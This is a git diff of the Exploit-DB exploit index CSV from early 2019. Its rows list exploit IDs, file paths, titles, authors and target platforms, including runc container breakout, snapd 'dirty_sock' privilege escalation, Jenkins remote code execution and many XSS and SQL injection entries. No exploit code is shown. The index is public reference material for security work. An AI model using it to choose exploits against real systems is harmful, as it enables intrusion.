46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
|
||||
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
|
||||
46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows,
|
||||
46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows,
|
||||
46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows,
|
||||
46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10294,9 +10297,11 @@ id,file,description,date,author,type,platform,port
|
|||
46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux,
|
||||
46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows,
|
||||
46346,exploits/windows/local/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,local,windows,
|
||||
46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution",2019-02-12,feexd,local,linux,
|
||||
46359,exploits/linux/local/46359.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1)",2019-02-12,feexd,local,linux,
|
||||
46361,exploits/linux/local/46361.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)",2019-02-13,"Chris Moberly",local,linux,
|
||||
46362,exploits/linux/local/46362.py,"snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)",2019-02-13,"Chris Moberly",local,linux,
|
||||
46370,exploits/windows/local/46370.txt,"exacqVision ESM 5.12.2 - Privilege Escalation",2019-02-14,bzyo,local,windows,
|
||||
46369,exploits/linux/local/46369.md,"runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)",2019-02-13,embargo,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -40819,8 +40824,6 @@ id,file,description,date,author,type,platform,port
|
|||
46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80
|
||||
46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,
|
||||
46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware,
|
||||
46363,exploits/hardware/webapps/46363.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting",2019-02-13,"Ronnie T Baby",webapps,hardware,80
|
||||
46364,exploits/hardware/webapps/46364.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
|
||||
46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi,443
|
||||
46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php,80
|
||||
46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php,
|
||||
|
@ -40830,6 +40833,12 @@ id,file,description,date,author,type,platform,port
|
|||
46352,exploits/linux/webapps/46352.rb,"Jenkins 2.150.2 - Remote Command Execution (Metasploit)",2019-02-12,AkkuS,webapps,linux,
|
||||
46353,exploits/aspx/webapps/46353.cs,"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution",2019-02-12,"Dustin Cobb",webapps,aspx,
|
||||
46354,exploits/php/webapps/46354.txt,"LayerBB 1.1.2 - Cross-Site Scripting",2019-02-12,0xB9,webapps,php,80
|
||||
46365,exploits/hardware/webapps/46365.txt,"Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)",2019-02-13,"Ronnie T Baby",webapps,hardware,80
|
||||
46366,exploits/php/webapps/46366.txt,"Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
|
||||
46368,exploits/php/webapps/46368.txt,"PilusCart 1.4.1 - 'send' SQL Injection",2019-02-13,"Mehmet EMIROGLU",webapps,php,80
|
||||
46372,exploits/php/webapps/46372.txt,"DomainMOD 4.11.01 - 'ssl-provider-name' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,
|
||||
46373,exploits/php/webapps/46373.txt,"DomainMOD 4.11.01 - 'ssl-accounts.php username' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
|
||||
46374,exploits/php/webapps/46374.txt,"DomainMOD 4.11.01 - 'category.php CatagoryName_ StakeHolder' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Raheem",webapps,php,80
|
||||
46375,exploits/php/webapps/46375.txt,"DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
|
||||
46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
|
||||
46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
|
||||
46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue